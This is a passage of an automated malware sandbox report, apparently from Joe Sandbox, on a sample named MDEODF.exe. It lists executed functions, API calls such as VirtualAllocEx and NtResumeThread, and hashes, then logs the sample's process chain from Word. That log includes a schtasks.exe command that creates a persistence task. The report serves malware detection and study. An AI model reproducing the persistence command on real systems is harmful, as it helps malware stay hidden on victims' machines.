Instruction Fuzzy Hash: D731BAB4D002599FCB14CFAAD984AEEFBF1AF49314F24842AE414B7240C778A949CF94

Function 001DC451 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 001DC4E1

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 551f287a7348db3da5d9201bc2fa41c1406ff33ac0acb0ba7b9b40cc8a5c50b9
Instruction ID: 2655884432a9f6511ef63ab609b7c09684ce19bffba3ee8682915318cdd13bf1
Opcode Fuzzy Hash: 551f287a7348db3da5d9201bc2fa41c1406ff33ac0acb0ba7b9b40cc8a5c50b9
Instruction Fuzzy Hash: 5631A8B5D012199FCF10CFA9E984AAEFBF5AB49310F20942AE815B7300C774A945CFA4

Function 001DC458 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 001DC4E1

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dee3bd9f9213f754d209e9ecf885dbd11c666b878f9b4e53a5d640d1b9173307
Instruction ID: e02412bb83a0039d9628b84e312578ec1d742d1b8ff0a096845adcf52efa9249
Opcode Fuzzy Hash: dee3bd9f9213f754d209e9ecf885dbd11c666b878f9b4e53a5d640d1b9173307
Instruction Fuzzy Hash: 283199B5D012199FCF10CFA9E984AAEFBF5BB49314F20942AE815B7300C775A945CF94

Function 001DC550 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DC602

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 57f936ec494efeefcacfc820a46dc9e2a632ccafa004d9f81e0e26ce9894e8ee
Instruction ID: adae4f4419719fe0106452f912ca4b60a58b39dc4f417f466a343606ab3f3c7b
Opcode Fuzzy Hash: 57f936ec494efeefcacfc820a46dc9e2a632ccafa004d9f81e0e26ce9894e8ee
Instruction Fuzzy Hash: 8B3198B8D002589FCF10CFA9D984AAEFBB1FB49310F10A42AE814B7310D735A945CF65

Function 001DC558 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DC602

Memory Dump Source

Source File: 00000011.00000002.393541227.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d0000_MDEODF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9c1194cde96099141fe0edb37cda412b789d786f3c1aa1d087078d109a7a8de6
Instruction ID: 43bb4367cdbfd9712c25e2048c0f827ded1695a1f6eae1a2543227615fb33e82
Opcode Fuzzy Hash: 9c1194cde96099141fe0edb37cda412b789d786f3c1aa1d087078d109a7a8de6
Instruction Fuzzy Hash: 86319AB9D002589FCF10CFA9D984AEEFBB1BB49310F10A42AE814B7314D735A945CF55

Analysis Process: MDEODF.exePID: 3216, Parent PID: 3168COMMON

Executed Functions

Function 001C0B60 Relevance: 2.0, Strings: 1, Instructions: 765COMMON

Download Yara Rule

Strings

dp, xrefs: 001C0E64

Memory Dump Source

Source File: 00000012.00000002.393458653.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID: dp
API String ID: 0-2261812057
Opcode ID: da64a84a64bd908f9daafc1ca4090f7bb3276d746215b37f808ef068b5fa77f5
Instruction ID: 20674c3e7b19110a3aa8c0b943f4260c70650b8e0cd24425dde6a8d52eb2f265
Opcode Fuzzy Hash: da64a84a64bd908f9daafc1ca4090f7bb3276d746215b37f808ef068b5fa77f5
Instruction Fuzzy Hash: 12828F74D00229CFCB25DFA8D884BDDBBB1BF49304F1085AAD409AB265D770AE85CF54

Function 001C05E7 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.393458653.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2efe3d571e77a3fc1b81b704c2fdaeeb8fd044cf14da2ddaa781706aaed9e3f5
Instruction ID: bf59e8dde2b71a89564fd9b117947adaf04123129165eaaedcdec8ec16178244
Opcode Fuzzy Hash: 2efe3d571e77a3fc1b81b704c2fdaeeb8fd044cf14da2ddaa781706aaed9e3f5
Instruction Fuzzy Hash: FB317271D093899FC703EF74E898B887FB1EB56344B1449EAC0449F167E7748A49CB91

Function 001C0630 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.393458653.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e5891e2a04b623ecfb3b012b529d2ee824c707e9f0dda4408c4e2c18e204ce7
Instruction ID: 9ee5407dc40865b967793e31ffdd22e99119d4e6913dee047e8281626bb83a9d
Opcode Fuzzy Hash: 8e5891e2a04b623ecfb3b012b529d2ee824c707e9f0dda4408c4e2c18e204ce7
Instruction Fuzzy Hash: 5B214D71D043499FC742EF78E89578D7FB1EF45304B1089AAD044AF26AE7749989CB81

Function 001C0A49 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.393458653.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
Instruction ID: 7959d25e02c2b8dc6f685cd6953f5ea11bc014bc0031872b38a6b44ec11d833c
Opcode Fuzzy Hash: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
Instruction Fuzzy Hash: AF215E71D002499FCF05DBA8D450ADDBFB1EF49310F4582A6D454BB262D770AA4ACF50

Function 001C0848 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.393458653.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c163dc16fea8a47184f63cb4d3770f51f276ef3ffdd3ee1253c781cfcf986c3
Instruction ID: 48a7b6ebd3c5f1a75fd3318d7d0ed90058d2176deeb0ba5792aa6b5106c9240f
Opcode Fuzzy Hash: 1c163dc16fea8a47184f63cb4d3770f51f276ef3ffdd3ee1253c781cfcf986c3
Instruction Fuzzy Hash: F811ED71D00309DFCB42EFA8E945B4D7BF1EB44344F508969D048AF66ADB74DA89CB81

Function 001C1870 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.393458653.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba73ce0febae81d186efeebf30f700dd7fcf799a0f0ef167b0073ed6595373d
Instruction ID: 550f6ba45bbd6bf6bf5169a4a08a668ea47bb2e2d1bf96678546cc5b680c1dee
Opcode Fuzzy Hash: 7ba73ce0febae81d186efeebf30f700dd7fcf799a0f0ef167b0073ed6595373d
Instruction Fuzzy Hash: 38F0C274C08249DFCF11DFA5E815BEEBBF0AB5A310F145069C414B7242D7384649CF61

Function 001C09DF Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.393458653.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
Instruction ID: 600d81742f4e6b7a3958b4fc25062223c3eddf70163431f7fa94f44781c3fdfe
Opcode Fuzzy Hash: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
Instruction Fuzzy Hash: 8001E470C09249DFCB12DFB8D894ADDBFB0AF06200F1446EEC445A72A2EB318A94CB41

Function 001C09F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.393458653.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
Instruction ID: 2a6b3a6ca18baabea358fd8632a1a93df948af0f4b1f39e3b28271318d4e0ea1
Opcode Fuzzy Hash: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
Instruction Fuzzy Hash: 99F0B274C0020DDFCB45EFA8D945AAEBBB4FB45300F1046AAC419A7250EB709A84CB80

Analysis Process: MDEODF.exePID: 3320, Parent PID: 3168COMMON

Executed Functions

Function 001C0B60 Relevance: 2.0, Strings: 1, Instructions: 765COMMON

Download Yara Rule

Strings

dp, xrefs: 001C0E64

Memory Dump Source

Source File: 00000013.00000002.393411616.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID: dp
API String ID: 0-2261812057
Opcode ID: b9ced87e71c5edad8767be522a87020ac5a6a2f8d1cc334386ca37c4b5dc5066
Instruction ID: 3e65168ff62f9b45afa51e3967e28a4869f247e8a80034fff4a3e190fae3b075
Opcode Fuzzy Hash: b9ced87e71c5edad8767be522a87020ac5a6a2f8d1cc334386ca37c4b5dc5066
Instruction Fuzzy Hash: D0828174900229CFCB25DFA8D884BDDB7B5BF49304F1086AAD409AB365E770AE85CF54

Function 001C05E7 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.393411616.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5fbb9c29cfca46268b1d64e8a6582c7c64a6798626f10785932689c168eb3ba
Instruction ID: 8cadb1f87423a0df844e05ffd290a51ebd2f13087e66b82c1d0686ebd4bb778b
Opcode Fuzzy Hash: b5fbb9c29cfca46268b1d64e8a6582c7c64a6798626f10785932689c168eb3ba
Instruction Fuzzy Hash: 5E3184719093899FC703EB64E894A8D7FB1EF46304F0445EAC1489B167E7748A49CB91

Function 001C0630 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.393411616.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a958e74c9340983737bc94c1912c2bf51f141ddca54a809377bbec110835c90
Instruction ID: dc67220ee18c1820effd6dbfa3bae7eb323089143298f56dc48b8b34493ccd62
Opcode Fuzzy Hash: 2a958e74c9340983737bc94c1912c2bf51f141ddca54a809377bbec110835c90
Instruction Fuzzy Hash: 26218371904349DFC703EF78E89578D7FB1EF45304F008AAAD1489B26AE7749989CB91

Function 001C0A49 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.393411616.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
Instruction ID: 7959d25e02c2b8dc6f685cd6953f5ea11bc014bc0031872b38a6b44ec11d833c
Opcode Fuzzy Hash: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
Instruction Fuzzy Hash: AF215E71D002499FCF05DBA8D450ADDBFB1EF49310F4582A6D454BB262D770AA4ACF50

Function 001C0848 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.393411616.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0fcc3da333c1dc3a6cfc20636612174f2b27b3311407838bb5ce6986ec6dd5
Instruction ID: ea0491fa7822f6e556a0736057826925ada3c836c1cc750637ebb811f57b2e2c
Opcode Fuzzy Hash: ca0fcc3da333c1dc3a6cfc20636612174f2b27b3311407838bb5ce6986ec6dd5
Instruction Fuzzy Hash: 4E115470D00309DFCB02EF68E985B8D7BB5FB44304F408A69D1189B269EB749A89CF90

Function 001C1870 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.393411616.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a23a1bff7743fc6d6f8e39b0910ffb754b6f5e12fbc3b1a1a6821d89cce0f77
Instruction ID: 4539d2bf660dd79c406bcafc1b227f82a669ef1ab0f2fc0d050ee5b46648257e
Opcode Fuzzy Hash: 8a23a1bff7743fc6d6f8e39b0910ffb754b6f5e12fbc3b1a1a6821d89cce0f77
Instruction Fuzzy Hash: C4F0AFB5C08249DBCF11DFA5E8147EEBBF0AB5A300F145069C014B7242D7384A45CF61

Function 001C09DF Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.393411616.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
Instruction ID: 600d81742f4e6b7a3958b4fc25062223c3eddf70163431f7fa94f44781c3fdfe
Opcode Fuzzy Hash: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
Instruction Fuzzy Hash: 8001E470C09249DFCB12DFB8D894ADDBFB0AF06200F1446EEC445A72A2EB318A94CB41

Function 001C09F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.393411616.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
Instruction ID: 2a6b3a6ca18baabea358fd8632a1a93df948af0f4b1f39e3b28271318d4e0ea1
Opcode Fuzzy Hash: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
Instruction Fuzzy Hash: 99F0B274C0020DDFCB45EFA8D945AAEBBB4FB45300F1046AAC419A7250EB709A84CB80

Analysis Process: MDEODF.exePID: 976, Parent PID: 3168COMMON

Executed Functions

Function 001C0B60 Relevance: 2.0, Strings: 1, Instructions: 765COMMON

Download Yara Rule

Strings

dp, xrefs: 001C0E64

Memory Dump Source

Source File: 00000014.00000002.393473372.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID: dp
API String ID: 0-2261812057
Opcode ID: ff676457af9fd7e6acee43392b3dc8aa2c94f8cea123f59a5a898e5b878efcf5
Instruction ID: 4f0613eae44e00c0130f984b78ef505ac63c68e7d800cda902fcc66e9f691465
Opcode Fuzzy Hash: ff676457af9fd7e6acee43392b3dc8aa2c94f8cea123f59a5a898e5b878efcf5
Instruction Fuzzy Hash: C1828F74900229CFCB25DFA8D884BEDBBB1FF49304F1085AAD419AB265D770AE85CF54

Function 001C05E7 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.393473372.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d18d1abfaab0fc46d7ed4d795526dc8308665040ad6be017130282843adb29
Instruction ID: 821dd9630022f7ec809a0f80c53c70b63ef09e14d3a9e9c384cfeaccf563dedf
Opcode Fuzzy Hash: 90d18d1abfaab0fc46d7ed4d795526dc8308665040ad6be017130282843adb29
Instruction Fuzzy Hash: A731B671909385DFC707EB64E894A9C7FB1EF4A304B0449EAC0459F167E7748A89CB91

Function 001C0630 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.393473372.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70bd5c14ce4361af9c1c0ef95c7f55ebff9c94ff642b743fe57a980417067d46
Instruction ID: 2f9c01d6ef6f92bebdb95cea516c459ce49bdedd859f07863e9ec9b7a8e8e4a7
Opcode Fuzzy Hash: 70bd5c14ce4361af9c1c0ef95c7f55ebff9c94ff642b743fe57a980417067d46
Instruction Fuzzy Hash: AE21D370901349DFC707EF78E89478C7FB1EF8A300F0089A9C0459B26AE7749989CB90

Function 001C0A49 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.393473372.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
Instruction ID: 7959d25e02c2b8dc6f685cd6953f5ea11bc014bc0031872b38a6b44ec11d833c
Opcode Fuzzy Hash: bb27ef99912939ebcd84ec372c8012f1c20af8c89cedb91b682be58300f579c8
Instruction Fuzzy Hash: AF215E71D002499FCF05DBA8D450ADDBFB1EF49310F4582A6D454BB262D770AA4ACF50

Function 001C0848 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.393473372.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0659f72a74da94f9b1e3f5061f52084d677299254fd3c82df4bec1b14f17f059
Instruction ID: 750396116505fe691a812b0a7183eb182f42279283b6c19300f73f60ea4ab89a
Opcode Fuzzy Hash: 0659f72a74da94f9b1e3f5061f52084d677299254fd3c82df4bec1b14f17f059
Instruction Fuzzy Hash: DB114274D00309DFCB06EF68E945B5D7BB1EB88304F408D68D0199B229DB749AC9CB90

Function 001C1870 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.393473372.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5890126bfa2aa0ef7707fb666e00d8ce539f41cbcb070b7aa4e7da18aad92e0
Instruction ID: de9ec68801072f2806b3b60b9e7f1b3a55591c882bbf3c9bb15e1f98c6c59c96
Opcode Fuzzy Hash: d5890126bfa2aa0ef7707fb666e00d8ce539f41cbcb070b7aa4e7da18aad92e0
Instruction Fuzzy Hash: 41F08C74C0828DDBCF11DFA5E8147EEBBF0AB5A300F145069D014B7242D7784645CF61

Function 001C09DF Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.393473372.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
Instruction ID: 600d81742f4e6b7a3958b4fc25062223c3eddf70163431f7fa94f44781c3fdfe
Opcode Fuzzy Hash: a078cdbf6f333a4a62ff7f62daf17899f65f2fc9e07c52628469c749deee0574
Instruction Fuzzy Hash: 8001E470C09249DFCB12DFB8D894ADDBFB0AF06200F1446EEC445A72A2EB318A94CB41

Function 001C09F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.393473372.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1c0000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
Instruction ID: 2a6b3a6ca18baabea358fd8632a1a93df948af0f4b1f39e3b28271318d4e0ea1
Opcode Fuzzy Hash: af0a75c188988b8935d5b61ff69e9796036712b468b15873ef9cff3f5baefaf8
Instruction Fuzzy Hash: 99F0B274C0020DDFCB45EFA8D945AAEBBB4FB45300F1046AAC419A7250EB709A84CB80

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe "C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe"
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {4070AE52-7E9D-44E5-8168-5CF4F89E1764} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe "C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe	Jump to behavior
